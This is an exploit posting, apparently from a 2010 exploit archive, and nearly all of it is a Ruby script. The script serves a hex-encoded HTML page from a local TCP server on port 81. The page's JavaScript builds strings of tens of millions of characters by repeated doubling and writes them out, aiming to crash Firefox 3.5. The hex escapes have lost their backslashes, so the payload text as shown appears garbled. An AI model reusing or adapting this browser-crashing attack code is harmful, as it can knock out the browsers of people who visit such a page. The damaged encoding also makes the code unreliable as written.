Firefox 3.5 Stack Overflow Exploit
Posted on 31 March 2010
================================== Firefox 3.5 Stack Overflow Exploit ================================== #!bin/ruby ######################################################### # Exploit : Shellcode Stack Overflow Firefox 3.5 # Date : 23/03/2010 # Author : Whivack Gsk? # Software Link : http://www.mozilla-europe.org/fr/firefox/3.5/releasenotes/ # Version : 3.5 # Tested On : XP/Vista & Ubuntu # Fonction : Connect Firefox Browser http://127.0.0.1:81/ ########################################################## require 'socket' shellcode = "x3Cx68x74x6Dx6Cx3E" + "x3Cx68x65x61x64x3E" + "x3Cx73x63x72x69x70x74x3E" + "x76x61x72x20x73x20x3Dx20x75x6Ex65x73x63x61x70x65x28x22x25x75x34x31x34x31x25x75x34x31x34x31x22x29x3Bx20" + "x76x61x72x20x73x74x20x3Dx20x75x6Ex65x73x63x61x70x65x28x22x25x75x30x30x30x30x25x75x30x30x30x30x22x29x3Bx20" + "x76x61x72x20x66x32x20x3Dx20x6Dx75x6Cx38x28x73x74x2Cx20x34x39x30x30x30x30x30x30x29x3Bx20" + "x76x61x72x20x66x20x3Dx20x6Dx75x6Cx38x28x73x2Cx20x32x31x30x30x30x30x30x30x29x3Bx20" + "x64x6Fx63x75x6Dx65x6Ex74x2Ex77x72x69x74x65x28x66x32x29x3Bx20" + "x64x6Fx63x75x6Dx65x6Ex74x2Ex77x72x69x74x65x28x66x29x3Bx20" + "x66x75x6Ex63x74x69x6Fx6Ex20x6Dx75x6Cx38x28x73x2Cx20x6Ex75x6Dx29x20x7Bx20" + "x76x61x72x20x69x20x3Dx20x4Dx61x74x68x2Ex63x65x69x6Cx28x4Dx61x74x68x2Ex6Cx6Fx67x28x6Ex75x6Dx29x20x2Fx20x4Dx61x74x68x2Ex4Cx4Ex32x29x2Cx20" + "x72x65x73x20x3Dx20x73x3B" + "x64x6Fx20x7B" + "x72x65x73x20x2Bx3Dx72x65x73x3B" + "x7Dx20x77x68x69x6Cx65x20x28x30x20x3Cx20x2Dx2Dx69x29x3B" + "x72x65x74x75x72x6Ex20x72x65x73x2Ex73x6Cx69x63x65x28x30x2Cx20x73x2Ex6Cx65x6Ex67x74x68x20x2Ax6Ex75x6Dx29x3B" + "x7D" + "x3Cx2Fx73x63x72x69x70x74x3E" + "x3Cx2Fx68x65x61x64x3E" + "x3Cx62x6Fx64x79x3E" + "x3Cx2Fx62x6Fx64x79x3E" + "x3Cx2Fx68x74x6Dx6Cx3E" + "x3Cx68x74x6Dx6Cx3E" + "x3Cx62x6Fx64x79x3E" + "x3Cx2Fx62x6Fx64x79x3E" + "x3Cx2Fx68x74x6Dx6Cx3E" serveur = TCPServer.new( 81 ) client = nil while ( ( client = serveur.accept ) ) requete = client.gets client.puts( "HTTP/1.0 200 OK" ) client.puts( "Content-Type:text/html" ) client.puts client.puts "#{shellcode}" client.close end # Inj3ct0r.com [2010-03-31]
